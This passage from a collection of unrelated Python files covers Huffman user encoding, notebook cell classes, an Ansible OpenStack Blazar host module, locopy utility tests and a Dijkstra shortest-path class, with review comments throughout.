    :param level: the level to be assigned to the node
    :param value_attr: the attribute of the node that designates the value
    :param unique_values: boolean value that indicates if the values are uniques for each node or not
                          If unique_values true, the value should be a container
    :return: two dictionaries: - between values and codes (if unique_values false -> value of the dictionary - list)
                               - between codes and values
    """
    values_to_codes = {}
    codes_to_values = {}
    # A leaf is recognized by its ORIGINAL level being 0, so capture it
    # before change_level overwrites it below.
    initial_level = node.level
    node.change_level(level)
    node.assign_code(code)
    # Recurse: right children get a '1' appended, left children a '0'.
    if node.right_node:
        values_to_codes_right, codes_to_values_right = encode_classes(node.right_node, code + '1', level - 1,
                                                                      value_attr, unique_values)
    if node.left_node:
        values_to_codes_left, codes_to_values_left = encode_classes(node.left_node, code + '0', level - 1,
                                                                    value_attr, unique_values)
    if initial_level == 0:
        # Leaf: emit this node's value/code pair.
        value = getattr(node, value_attr)
        if unique_values:
            # NOTE(review): with unique values the attribute is expected to be
            # a container holding a single element — confirm with callers.
            value = value.pop()
            values_to_codes[value] = node.code
        else:
            # Non-unique values map to a LIST of codes so duplicate
            # frequencies survive the merge step.
            values_to_codes[value] = [node.code]
        codes_to_values[node.code] = value
        return values_to_codes, codes_to_values
    # Internal node: combine the children's mappings.
    # NOTE(review): an internal node with exactly one child would leave the
    # *_left or *_right locals unbound and raise NameError here; Huffman
    # trees always have two children, so this is presumably unreachable.
    if unique_values:
        values_to_codes = {**values_to_codes_right, **values_to_codes_left}
    else:
        values_to_codes = merge_dict(values_to_codes_left, values_to_codes_right)
    codes_to_values = {**codes_to_values_left, **codes_to_values_right}
    return values_to_codes, codes_to_values
def build_huffman_tree(list_of_values):
    """
    Builds the Huffman tree (nodes, left/right links, weights).
    :param list_of_values: the weights/frequencies the tree should use
    :return: the root node of the tree
    """
    pq = queue.PriorityQueue()
    for weight in list_of_values:
        pq.put((weight, HuffmanBinaryNode(weight)))
    # Repeatedly merge the two lightest subtrees until one tree remains.
    while pq.qsize() > 1:
        l_weight, l_node = pq.get()
        r_weight, r_node = pq.get()
        merged_weight = l_weight + r_weight
        merged_level = max(l_node.level, r_node.level) + 1
        pq.put((merged_weight,
                HuffmanBinaryNode(merged_weight, l_node, r_node, merged_level)))
    top = pq.get()
    # Entries are (weight, node) tuples; unwrap the node.
    if isinstance(top, tuple):
        return top[1]
    return HuffmanBinaryNode(top)
def create_encoding_huffman(users):
    """
    Main function for Huffman Encoding. Builds the tree, calculates the codes for every class and returns the dicts
    :param users: the list of users to encode. The frequency of the users is going to be calculated using this list
    :return: two dictionaries: - between classes and codes
                               - between codes and classes
             plus the maximum code length (tree height)
    """
    count_users = users.value_counts()
    freq_list = list(count_users)
    root = build_huffman_tree(freq_list)
    dict_value_code, _ = encode_classes(root, '', root.level, "value", False)
    dict_class_code = {}
    dict_code_class = {}
    # BUG FIX: Series.iteritems() was deprecated in pandas 1.5 and removed in
    # pandas 2.0; Series.items() is the identical replacement.
    for user, freq in count_users.items():
        # Users sharing a frequency consume codes from the same list, in order.
        code = dict_value_code[freq].pop(0)
        dict_class_code[user] = code
        dict_code_class[code] = user
    return dict_class_code, dict_code_class, root.level
def create_balanced_tree_encoding(users):
    """
    Main function for Balanced Tree encoding. Calculates the codes for every class and returns the dicts
    :param users: the list of users to encode. The frequency of the users is going to be calculated using this list
    :return: two dictionaries: - between classes and codes
                               - between codes and classes
             plus the maximum code length
    """
    count_users = users.value_counts()
    freq_list = list(count_users)
    value_to_codes, max_len = assign_code(freq_list)
    dict_user_code = {}
    dict_code_user = {}
    # BUG FIX: Series.iteritems() was deprecated in pandas 1.5 and removed in
    # pandas 2.0; Series.items() is the identical replacement.
    for user, freq in count_users.items():
        # Users sharing a frequency consume codes from the same list, in order.
        code = value_to_codes[freq].pop(0)
        dict_user_code[user] = code
        dict_code_user[code] = user
    return dict_user_code, dict_code_user, max_len
def encode_users(users, dict_user_code, encoding_length):
    """
    Encode the users from the list.
    :param users: the list of users to be encoded
    :param dict_user_code: dict with users as keys and their binary code as value
    :param encoding_length: the length of the binary codes
    :return: a pandas DataFrame with one code character per column; columns
             are named "col_0" .. "col_{encoding_length-1}"
    """
    columns = [f'col_{bit}' for bit in range(encoding_length)]
    encoded = pd.DataFrame(index=np.arange(len(users)), columns=columns)
    for row, user in enumerate(users):
        # Spread the code string over the columns, one character each.
        encoded.iloc[row] = list(dict_user_code[user])
    return encoded
def decode_users(encoded_users, dict_code_user):
    """
    Turn a binary-valued DataFrame back into the list of users.
    :param encoded_users: DataFrame whose rows are binary code vectors
    :param dict_code_user: dict mapping binary string codes to users
    :return: the decoded list of users; when a row's code is not an exact
             key, the nearest known code (by humming_distance) is used
    """
    rendered = encoded_users.to_string(header=False, index=False, index_names=False)
    # Collapse each printed row into a contiguous code string.
    row_codes = [''.join(row.split()) for row in rendered.split('\n')]
    decoded = []
    for code in row_codes:
        if code not in dict_code_user:
            code = closest_word(code, list(dict_code_user.keys()))
        decoded.append(dict_code_user[code])
    return decoded
def humming_distance(word1, word2):
    """
    Bitwise (Hamming-style) distance between two words; any difference in
    length is added to the mismatch count.
    :param word1: first word
    :param word2: second word
    :return: number of differing positions plus the length gap
    """
    length_gap = abs(len(word1) - len(word2))
    mismatches = sum(a != b for a, b in zip(word1, word2))
    return length_gap + mismatches
def closest_word(word, list_word):
    """
    Return the element of list_word nearest to word by humming_distance
    (the first minimum wins on ties, matching index-of-min semantics).
    :param word: the word whose nearest neighbour should be found
    :param list_word: the candidate words
    """
    return min(list_word, key=lambda candidate: humming_distance(word, candidate))
def assign_code(values_list, code=''):
    """
    Method to assign the codes for the Balanced Tree Encoding
    :param values_list: list of values to encode
    :param code: the code for the current "node"
    :return: values_to_codes - dict with list of codes for every value,
             max_len - the length of the codes
    """
    values_to_codes = {}
    if len(values_list) == 1:
        # Single value: it gets the accumulated code as-is.
        values_to_codes[values_list[0]] = [code]
        return values_to_codes, len(code)
    right_side = False
    right_list = []
    left_list = []
    # Randomly deal the values into two halves, alternating sides so the
    # split stays balanced.  NOTE(review): this CONSUMES values_list (the
    # caller's list is emptied) — confirm callers do not reuse it.
    while len(values_list):
        # Weighted draw: larger values are more likely to be picked earlier.
        value = random.choices(values_list, weights=values_list, k=1).pop()
        values_list.remove(value)
        if right_side:
            right_list.append(value)
            right_side = False
        else:
            left_list.append(value)
            right_side = True
    values_to_codes_left, max_len_left = assign_code(left_list, code+'0')
    values_to_codes_right, max_len_right = assign_code(right_list, code+'1')
    max_len = max(max_len_right, max_len_left)
    # merge_dict comes from the project-local util module; presumably it pads
    # codes to max_len while merging — confirm against util.merge_dict.
    values_to_codes = merge_dict(values_to_codes_left, values_to_codes_right, max_len)
    return values_to_codes, max_len
|
'''
Name:
Date:
Class:
Assignment:
'''
import webapp2# uses the webapp2 library
class MainHandler(webapp2.RequestHandler):
    """webapp2 request handler for '/' (Google App Engine, Python 2)."""
    def get(self):
        # Handles HTTP GET: builds two demo buttons and prints their labels.
        about_button = Button()
        about_button.label = "About Us"
        about_button.show_label()
        contact_button = Button()
        contact_button.label = "Contact Us"
        contact_button.show_label()
        # NOTE(review): nothing is written to the HTTP response yet.
class Button(object):
    """Toy widget demonstrating public / protected / private attribute naming."""

    def __init__(self):
        self.label = ""          # public attribute
        self.__size = 60         # name-mangled "private" attribute
        self._color = "000000"   # "protected" by convention only
        #self.on_roll_over("Hello.")

    def click(self):
        # BUG FIX (compatibility): the original used Python-2-only print
        # statements; the parenthesized single-argument form behaves the same
        # on Python 2 and also runs on Python 3.
        print("I've been clicked")

    def on_roll_over(self, message):
        print("You've rolled over my button" + message)

    def show_label(self):
        print("My label is "+self.label)
#Leave this alone, don't touch it.
# WSGI application wiring: routes '/' to MainHandler (debug mode enabled).
app = webapp2.WSGIApplication([
    ('/', MainHandler)
], debug=True)
|
# encoding: utf-8
# -*- test-case-name: ipython1.test.test_nodes -*-
"""The classes and interfaces for nodes and cells for use in notebooks
"""
__docformat__ = "restructuredtext en"
#-------------------------------------------------------------------------------
# Copyright (C) 2005 Fernando Perez <fperez@colorado.edu>
# Brian E Granger <ellisonbg@gmail.com>
# Benjamin Ragan-Kelley <benjaminrk@gmail.com>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
import zope.interface as zi
from IPython.genutils import time
# the classes for use in notebook.py
# NOTE(review): exported class names consumed by notebook.py; keep this list
# in sync with the concrete classes defined below.
classes = ['TextCell', 'IOCell', 'ImageCell', 'Node']
#-------------------------------------------------------------------------------
# Node and Cell Interfaces
#-------------------------------------------------------------------------------
class ICell(zi.Interface):
    """The Basic Cell Interface, implemented by all Nodes and Cells"""
    # zope.interface attribute declarations — documentation only, no storage.
    parent = zi.Attribute("Node: The parent object of the cell")
    dateCreated = zi.Attribute("String: The date the cell was created")
    dateModified = zi.Attribute("String: The date the cell was most recently modified")
    tags = zi.Attribute("List of Strings: Tags used for searching")
class INode(ICell):
    """The Basic Node Interface"""
    children = zi.Attribute("Dict: the children of the node")
    # Interface methods are declared without `self`, per zope.interface convention.
    def addChild(child, index=None):
        """adds `child` to the node after `index`, defaulting to the end"""
    def popChild(index):
        """removes the child at `index`"""
class ITextCell(ICell):
    """A Basic text cell"""
    text = zi.Attribute("String: the text of the cell")
    format = zi.Attribute("String: the formatting for the text")
class IIOCell(ICell):
    """A Basic I/O Cell: one input/output pair of an execution."""
    input = zi.Attribute("String: input python code")
    output = zi.Attribute("String: The output of input")
class IImageCell(ICell):
    """A Basic Cell for images"""
    image = zi.Attribute("Image: The image object")
#-------------------------------------------------------------------------------
# Node and Cell Objects
#-------------------------------------------------------------------------------
# helper code for strings
def _padstr(n):
    """Zero-pad an integer to two digits (e.g. 7 -> '07')."""
    return "%02i"%n
def strtime():
    """Return the local time as a colon-separated 'YY:MM:DD:HH:MM:SS'-style stamp."""
    return ":".join(map(_padstr, time.localtime()[:6]))
class Cell(object):
    """The base Cell class: tracks id, parent, tags, and creation/modification
    timestamps; modifications propagate up to the parent node."""
    zi.implements(ICell)

    def _modify(self):
        # Refresh the modification stamp and bubble the change upward.
        self.dateModified = strtime()
        if self.parent is not None:
            self.parent._modify()

    def _setCreated(self, c):
        # dateCreated is read-only by design.
        raise IOError("dateCreated cannot be changed")

    def _getCreated(self):
        return self._dateCreated

    def _setTags(self, tags):
        self._tags = tags
        self._modify()

    def _getTags(self):
        return self._tags

    tags = property(_getTags, _setTags)
    dateCreated = property(_getCreated, _setCreated)

    def __init__(self, id, parent=None, tags=None):
        """:param id: cell identifier
        :param parent: enclosing Node (or None for a root cell)
        :param tags: optional list of search tags"""
        self.id = id
        self.parent = parent
        self._dateCreated = strtime()
        self.dateModified = self.dateCreated
        # BUG FIX: the original default tags=[] was a single mutable list
        # shared by every Cell created without explicit tags.
        self._tags = [] if tags is None else tags

    def addTags(self, **tags):
        # NOTE(review): _tags is a list by default and list has no .update();
        # this call only works if tags was supplied as a dict/set — confirm
        # the intended tag container type.
        self._tags.update(tags)
        self._modify()
class Node(Cell):
    """The basic Node class: a Cell holding an ordered list of children."""
    zi.implements(INode)
    className = "Node"

    def __init__(self, id, parent=None, flags=None):
        self.children = []
        # BUG FIX: the original called super().__init__(parent, flags),
        # shifting every argument left by one (parent arrived as `id`, flags
        # as `parent`, and the real id was dropped).  Also avoid the mutable
        # default {}.
        super(Node, self).__init__(id, parent, {} if flags is None else flags)

    def addChild(self, child, index=None):
        """add child at index, defaulting to the end; returns the index used"""
        if index is None:
            # add to end
            self.children.append(child)
            self._modify()
            return len(self.children) - 1
        elif index < len(self.children):
            self.children = self.children[:index] + [child] + self.children[index:]
            self._modify()
            return index
        else:
            raise IndexError

    def popChild(self, index):
        """remove and return child at index"""
        if index < len(self.children):
            self._modify()
            return self.children.pop(index)
        else:
            raise IndexError
class TextCell(Cell):
    """A Cell for text; setting .text stamps the cell as modified."""
    zi.implements(ITextCell)
    className = "TextCell"

    def _setText(self, text):
        self._text = text
        self._modify()

    def _getText(self):
        return self._text

    text = property(_getText, _setText)

    def __init__(self, id, text="", parent=None, tags=None):
        # BUG FIX: the mutable default tags=[] was shared across instances;
        # normalize to a fresh list here so the fix stands alone.
        super(TextCell, self).__init__(id, parent, [] if tags is None else tags)
        self._text = text
class IOCell(Cell):
    """A Cell for handling execution: an input/output pair, each stamping the
    cell as modified when set."""
    zi.implements(IIOCell)
    className = "IOCell"

    def _setInput(self, inp):
        self._input = inp
        self._modify()

    def _getInput(self):
        return self._input

    def _setOutput(self, out):
        self._output = out
        self._modify()

    def _getOutput(self):
        return self._output

    input = property(_getInput, _setInput)
    output = property(_getOutput, _setOutput)

    def __init__(self, id, input="", parent=None, tags=None):
        self._input = input
        self._output = ""
        # BUG FIX: the mutable default tags=[] was shared across instances.
        super(IOCell, self).__init__(id, parent, [] if tags is None else tags)
class ImageCell(Cell):
    """A Cell for holding images; setting .image stamps the cell as modified."""
    zi.implements(IImageCell)
    className = "ImageCell"

    def _setImage(self, im):
        self._image = im
        self._modify()

    def _getImage(self):
        return self._image

    # NOTE(review): only a getter/setter pair is defined; unlike the sibling
    # cells there is no `image = property(...)` line — confirm whether that
    # omission is intentional before adding one.
    def __init__(self, id, im=None, parent=None, tags=None):
        self._image = im
        # BUG FIX: the mutable default tags=[] was shared across instances.
        super(ImageCell, self).__init__(id, parent, [] if tags is None else tags)
|
# Scratch/test script: sanity prints left over from repository testing.
# BUG FIX: a stray " |" concatenation artifact on the last line made the
# file unparsable; it has been removed.
print('testing 061121')
print('this is a change')
print('just generated a gpg key for the sake of verifying commits')
# get the user's information
print("\nPlease enter the following information:\n")
first_name = input("First name: ")
last_name = input("Last name: ")
email = input("Email address: ")
phone = input("Phone number: ")
job_title = input("Job title: ")
id_number = input("ID number: ")
hair = input("Hair color: ")
eyes = input("Eye color: ")
month = input("Month started: ")
answer = input("Have you completed training(Y/N): ")
# BUG FIX: the original test was `answer == "y" or "N"`.  The non-empty
# string "N" is always truthy, so EVERY answer produced "Yes".  Accept
# either case of "y" as the affirmative answer.
if answer.lower() == "y":
    training = "Yes"
else:
    training = "No"
# combine variables for alignment
hair_color = "Hair: " + hair
eye_color = "Eyes: " + eyes
start_month = "Month: " + month
training_completed = "Training: " + training
# output the user's id card
print("\nThe ID Card is:")
print("--------------------------------------------")
print(f"{last_name.upper()}, {first_name.capitalize()}\n{job_title.title()}\nID: {id_number}\n\n{email.lower()}\n{phone}\n")
# output aligned text (fixed-width columns)
print(f"{hair_color.title() : <18}{eye_color.title() : <15}")
print(f"{start_month.title() : <18}{training_completed.title() : <15}")
print("--------------------------------------------\n")
|
import pytest, time
from utils import environment as env
from utils.environment import Pages as on
@pytest.mark.usefixtures("test_setup")
class TestCNTProject(object):
    """Selenium UI regression flow for the CNT project site."""
    def test_sal(self):
        # End-to-end walk through the Say-A-Lot page: navigation, card click,
        # email validation (invalid then valid), and the "see more" control.
        # NOTE(review): self.driver is injected by the test_setup fixture.
        self.driver.get(env.page_url)
        on.Home.navigate_to_saysalot_page(self)
        on.SAL.scrolling_down_page(self)
        on.SAL.click_on_sal_card(self)
        on.SAL.go_back_to_previous_page(self)
        on.SAL.submit_invalid_email(self)
        on.SAL.clear_email_field(self)
        on.SAL.submit_valid_email(self)
        on.SAL.scrolling_down_page(self)
        on.SAL.click_see_more_button(self)
|
#!/usr/bin/python
#import json
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _get_blazar_hosts(reservation):
req_url = reservation.get_endpoint() + "/os-hosts"
return reservation.get(url=req_url).json()
def _get_host_by_hostname(reservation, hostname):
    """Return the Blazar host whose hypervisor_hostname matches, or None."""
    listing = _get_blazar_hosts(reservation)
    for candidate in listing['hosts']:
        if candidate['hypervisor_hostname'] == hostname:
            return candidate
    return None
def main():
    """Ansible module entry point: ensure a Blazar host exists for an Ironic node.

    Looks up the Ironic node by name, then creates or updates the matching
    Blazar (reservation service) host record.  state=absent is accepted but
    not implemented.
    """
    argument_spec = openstack_full_argument_spec(
        name=dict(required=False),
        node_type=dict(required=False),
        state=dict(default='present', choices=['absent', 'present'])
    )
    module_kwargs = openstack_module_kwargs()
    module = AnsibleModule(
        argument_spec,
        supports_check_mode=True,
        **module_kwargs
    )
    name = module.params['name']
    node_type = module.params['node_type']
    state = module.params['state']
    sdk, cloud = openstack_cloud_from_module(module)
    # Find the associated Ironic node.
    # BUG FIX: both handlers below were bare `except:` clauses, which also
    # swallow SystemExit/KeyboardInterrupt; they are narrowed here.
    try:
        node = cloud.get_machine(name)
        node_uuid = node['id']
    except Exception:
        module.fail_json(msg="Cannot find Ironic node for %s." % name)
    try:
        blazar = cloud.reservation
        if module.params['state'] == 'present':
            host_data = dict(
                name=node_uuid,
                node_type=node_type
            )
            # Does a host already exist for this hypervisor_hostname?
            host = _get_host_by_hostname(blazar, node_uuid)
            if not host:
                # No host, so add one.
                req_url = "%s/os-hosts" % (blazar.get_endpoint())
                new_host = blazar.post(url=req_url, json=host_data).json()
                if 'error_code' in new_host:
                    module.fail_json(msg=new_host['error_message'])
                module.exit_json(changed=True, result="Node added.", changes=new_host)
            else:  # Host exists
                # Does it need to be updated?
                try:
                    host_config = dict(
                        name=host['hypervisor_hostname'],
                        node_type=host['node_type']
                    )
                except KeyError:
                    # node_type is optional on existing hosts.
                    host_config = dict(
                        name=host['hypervisor_hostname'],
                    )
                # Determine the configuration change(s) as a key/value diff.
                patch_dict = dict(set(host_data.items()) - set(host_config.items()))
                if patch_dict:
                    req_url = "%s/os-hosts/%s" % (blazar.get_endpoint(), host['id'])
                    update_host = blazar.put(url=req_url, json=patch_dict).json()
                    if 'error_code' in update_host:
                        module.fail_json(msg=update_host['error_message'])
                    module.exit_json(changed=True, result="Node updated", changes=patch_dict)
                else:
                    module.exit_json(changed=False, result="Node not updated")
        else:
            module.exit_json(changed=False, msg="Removing hosts is not currently supported.")
    except sdk.exceptions.OpenStackCloudException as e:
        module.fail_json(msg=e.message, extra_data=e.extra_data)


if __name__ == '__main__':
    main()
|
import os
import sys
import time
from codebase.utils.log import Log
from codebase.datasets import TextDataset, DataPreprocess
from codebase.utils.prepare import Preparation
from codebase.condGAN import condGAN
# NOTE(review): joining with './.' just re-normalizes the script's own path;
# presumably intended to put the project root on sys.path — confirm.
dir_path = (os.path.abspath(os.path.join(os.path.realpath(__file__), './.')))
sys.path.append(dir_path)
if __name__ == "__main__":
    # Preparing environment: parse config, fix seeds, set up output dir + CUDA.
    prep = Preparation()
    cfg = prep.parse_arguments('cfg/eval_bird.yml')
    prep.set_random_seed()
    output_dir = prep.set_output_dir()
    prep.set_cuda()
    # Init log
    log = Log(output_dir)
    log.add('Using config: {} \n'.format(cfg), False)
    # Get data loader for the test split.
    dataprep = DataPreprocess(log)
    image_transform = dataprep.image_transform()
    dataloader, dataset = dataprep.get_dataloader('test', image_transform, True)
    # Define models and go to evaluate
    model = condGAN(output_dir, dataloader, dataset.n_words, dataset.ixtoword, log)
    start_t = time.time()
    # Generate images from pre-extracted embeddings
    if cfg.B_VALIDATION:
        model.sampling('test')  # generate images for the whole valid dataset
    else:
        model.prepare_dict_from_files(dataset.wordtoix)  # generate images for customized captions
    end_t = time.time()
    log.add('Total time for evaluation: {}'.format(end_t - start_t))
|
def intro(**data):
    """Print the collected keyword arguments: first their container type,
    then each key/value pair on its own line."""
    print("\nData type of argument:", type(data))
    for key, value in data.items():
        print("{} is {}".format(key, value))


# Demo calls: direct keyword arguments and a dict unpacked with **.
intro(Firstname="Sita", Lastname="Sharma", Age=22, Phone=1234567890)
intro(Firstname="John", Lastname="Wood", Email="johnwood@nomail.com", Country="Wakanda", Age=25, Phone=9876543210)
h = {"id": 2, "class": 7, "roll": 9}
# BUG FIX: a stray " |" concatenation artifact after this call made the
# file unparsable; it has been removed.
intro(**h)
# MIT License
#
# Copyright (c) 2018 Capital One Services, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import pytest
from unittest import mock
from io import StringIO
from itertools import cycle
from botocore.credentials import Credentials
from locopy.utility import compress_file, compress_file_list, split_file, concatenate_files
from locopy.errors import CompressionError, LocopySplitError, CredentialsError, LocopyConcatError
import locopy.utility as util
# Minimal config fixture containing every key read by read_config_yaml.
GOOD_CONFIG_YAML = u"""host: my.redshift.cluster.com
port: 1234
database: db
user: userid
password: pass"""
# Same fixture with the required `host` key omitted.
BAD_CONFIG_YAML = """port: 1234
database: db
user: userid
password: pass"""
def cleanup(splits):
    """Delete every file produced by a split operation."""
    for path in splits:
        os.remove(path)
def compare_file_contents(base_file, check_files):
    """Check that base_file's lines, dealt round-robin across check_files,
    match each check file's successive lines.

    Returns True on a full match, False at the first mismatching line.
    BUG FIX: the original opened every check file and never closed any of
    them (leaked handles on every call); they are now closed in all paths.
    """
    handles = [open(x, "rb") for x in check_files]
    try:
        rotation = cycle(handles)
        with open(base_file, "rb") as base:
            for line in base:
                if next(rotation).readline() != line:
                    return False
        return True
    finally:
        for handle in handles:
            handle.close()
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file(mock_shutil, mock_gzip_open, mock_open):
    """compress_file opens input rb, output via gzip wb, and pipes through copyfileobj."""
    compress_file("input", "output")
    mock_open.assert_called_with("input", "rb")
    mock_gzip_open.assert_called_with("output", "wb")
    mock_shutil.assert_called_with(mock_open().__enter__(), mock_gzip_open().__enter__())
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file_exception(mock_shutil, mock_gzip_open, mock_open):
    """Any failure during the copy is re-raised as CompressionError."""
    mock_shutil.side_effect = Exception("SomeException")
    with pytest.raises(CompressionError):
        compress_file("input", "output")
@mock.patch("locopy.utility.os.remove")
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file_list(mock_shutil, mock_gzip_open, mock_open, mock_remove):
    """compress_file_list appends .gz per input and handles the empty list."""
    res = compress_file_list([])
    assert res == []
    res = compress_file_list(["input1"])
    assert res == ["input1.gz"]
    res = compress_file_list(["input1", "input2"])
    assert res == ["input1.gz", "input2.gz"]
@mock.patch("locopy.utility.os.remove")
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file_list_exception(mock_shutil, mock_gzip_open, mock_open, mock_remove):
    """A copy failure mid-list is re-raised as CompressionError."""
    mock_shutil.side_effect = Exception("SomeException")
    with pytest.raises(CompressionError):
        compress_file_list(["input1", "input2"])
def test_split_file():
    """split_file is a no-op for 1 part, and for N parts produces N chunk
    files whose interleaved contents reproduce the original file."""
    input_file = "tests/data/mock_file.txt"
    output_file = "tests/data/mock_output_file.txt"
    # splits=1 (default): the original file is returned untouched.
    splits = split_file(input_file, output_file)
    assert splits == [input_file]
    expected = ["tests/data/mock_output_file.txt.0", "tests/data/mock_output_file.txt.1"]
    splits = split_file(input_file, output_file, 2)
    assert splits == expected
    assert compare_file_contents(input_file, expected)
    cleanup(splits)
    expected = [
        "tests/data/mock_output_file.txt.0",
        "tests/data/mock_output_file.txt.1",
        "tests/data/mock_output_file.txt.2",
    ]
    splits = split_file(input_file, output_file, 3)
    assert splits == expected
    assert compare_file_contents(input_file, expected)
    cleanup(splits)
    expected = [
        "tests/data/mock_output_file.txt.0",
        "tests/data/mock_output_file.txt.1",
        "tests/data/mock_output_file.txt.2",
        "tests/data/mock_output_file.txt.3",
        "tests/data/mock_output_file.txt.4",
    ]
    splits = split_file(input_file, output_file, 5)
    assert splits == expected
    assert compare_file_contents(input_file, expected)
    cleanup(splits)
def test_split_file_exception():
    """Invalid split counts raise LocopySplitError, and a mid-split failure
    cleans up the partial chunk files (one os.remove per chunk)."""
    input_file = "tests/data/mock_file.txt"
    output_file = "tests/data/mock_output_file.txt"
    # split_file patches the builtin next(); its module name differs on Py2/Py3.
    if sys.version_info.major == 3:
        builtin_module_name = "builtins"
    else:
        builtin_module_name = "__builtin__"
    # Non-positive and non-integer counts are rejected.
    with pytest.raises(LocopySplitError):
        split_file(input_file, output_file, -1)
    with pytest.raises(LocopySplitError):
        split_file(input_file, output_file, 0)
    with pytest.raises(LocopySplitError):
        split_file(input_file, output_file, 5.65)
    with pytest.raises(LocopySplitError):
        split_file(input_file, output_file, "123")
    with pytest.raises(LocopySplitError):
        split_file(input_file, output_file, "Test")
    with mock.patch("{0}.next".format(builtin_module_name)) as mock_next:
        with mock.patch("os.remove") as mock_remove:
            mock_next.side_effect = Exception("SomeException")
            with pytest.raises(LocopySplitError):
                split_file(input_file, output_file, 2)
            assert mock_remove.call_count == 2
            mock_remove.reset_mock()
            with pytest.raises(LocopySplitError):
                split_file(input_file, output_file, 3)
            assert mock_remove.call_count == 3
    # os.remove was mocked above, so delete the leftover chunks for real.
    cleanup(
        [
            "tests/data/mock_output_file.txt.0",
            "tests/data/mock_output_file.txt.1",
            "tests/data/mock_output_file.txt.2",
        ]
    )
@mock.patch("locopy.utility.open", mock.mock_open(read_data=GOOD_CONFIG_YAML))
def test_read_config_yaml_good():
    """A complete YAML config parses into exactly the five expected keys."""
    actual = util.read_config_yaml("filename.yml")
    assert set(actual.keys()) == set(["host", "port", "database", "user", "password"])
    assert actual["host"] == "my.redshift.cluster.com"
    assert actual["port"] == 1234
    assert actual["database"] == "db"
    assert actual["user"] == "userid"
    assert actual["password"] == "pass"
def test_read_config_yaml_io():
    """read_config_yaml also accepts an already-open stream (StringIO)."""
    actual = util.read_config_yaml(StringIO(GOOD_CONFIG_YAML))
    assert set(actual.keys()) == set(["host", "port", "database", "user", "password"])
    assert actual["host"] == "my.redshift.cluster.com"
    assert actual["port"] == 1234
    assert actual["database"] == "db"
    assert actual["user"] == "userid"
    assert actual["password"] == "pass"
def test_read_config_yaml_no_file():
    """A missing config file surfaces as CredentialsError."""
    with pytest.raises(CredentialsError):
        util.read_config_yaml("file_that_does_not_exist.yml")
def test_concatenate_files():
    """concatenate_files merges the inputs in order and removes each source
    (os.remove is mocked so the fixtures survive)."""
    inputs = ["tests/data/cat_1.txt", "tests/data/cat_2.txt", "tests/data/cat_3.txt"]
    output = "tests/data/cat_output.txt"
    with mock.patch("locopy.utility.os.remove") as mock_remove:
        concatenate_files(inputs, output)
    assert mock_remove.call_count == 3
    # The three 5-line inputs concatenate to the numbers 1..15.
    # NOTE(review): the file handle opened inline here is never closed.
    assert [int(line.rstrip("\n")) for line in open(output)] == list(range(1, 16))
    os.remove(output)
def test_concatenate_files_exception():
    """An empty input list, or a failure while opening, raises LocopyConcatError."""
    inputs = ["tests/data/cat_1.txt", "tests/data/cat_2.txt", "tests/data/cat_3.txt"]
    output = "tests/data/cat_output.txt"
    with pytest.raises(LocopyConcatError):
        concatenate_files([], output, remove=False)
    with mock.patch("locopy.utility.open") as mock_open:
        mock_open.side_effect = Exception()
        with pytest.raises(LocopyConcatError):
            concatenate_files(inputs, output, remove=False)
|
import heapq
from collections import defaultdict
from sys import maxsize
class Graph:
    """Directed weighted graph with Dijkstra shortest-path search."""

    def __init__(self, n):
        # Adjacency list: u -> [(v, weight), ...]; n is the node count.
        self.graph = defaultdict(list)
        self.n = n

    def add_edge(self, u, v, weight):
        """Add a directed edge u -> v with the given weight."""
        self.graph[u].append((v, weight))

    def printer(self):
        """Pretty-print the edge list as a U/V/W table."""
        print("U\tV\tW")
        print("-" * 10)
        n = max(self.graph) + 1
        for u in range(n):
            for v, w in self.graph[u]:
                print(f"{u}\t{v}\t{w}")
        print("-" * 10)

    def dijkstra(self, start, end):
        """Single-source shortest paths from start; stops early at end.

        :return: (distance, previous) lists of length n; unreachable nodes
                 keep distance == sys.maxsize and previous is None.

        BUG FIX: the original pushed (node, dist) tuples, so the heap was
        ordered by node index rather than by distance, and it used
        heapq.heapreplace, which evicts an arbitrary smallest entry.  This is
        the standard lazy-deletion Dijkstra with (dist, node) tuples.
        """
        visited = [False] * self.n
        previous = [None] * self.n
        distance = [maxsize] * self.n
        distance[start] = 0
        heap = [(0, start)]
        while heap:
            dist, node = heapq.heappop(heap)
            if visited[node]:
                continue  # stale entry superseded by a shorter path
            visited[node] = True
            if node == end:
                break  # target settled; its distance is final
            for neighbor, weight in self.graph[node]:
                if visited[neighbor]:
                    continue
                candidate = dist + weight
                if candidate < distance[neighbor]:
                    distance[neighbor] = candidate
                    previous[neighbor] = node
                    heapq.heappush(heap, (candidate, neighbor))
        return distance, previous

    def find_shortest_path(self, start, end):
        """Return the node sequence of the shortest start->end path
        ([] when end is unreachable)."""
        distance, previous = self.dijkstra(start, end)
        if distance[end] == maxsize:
            return []
        path = []
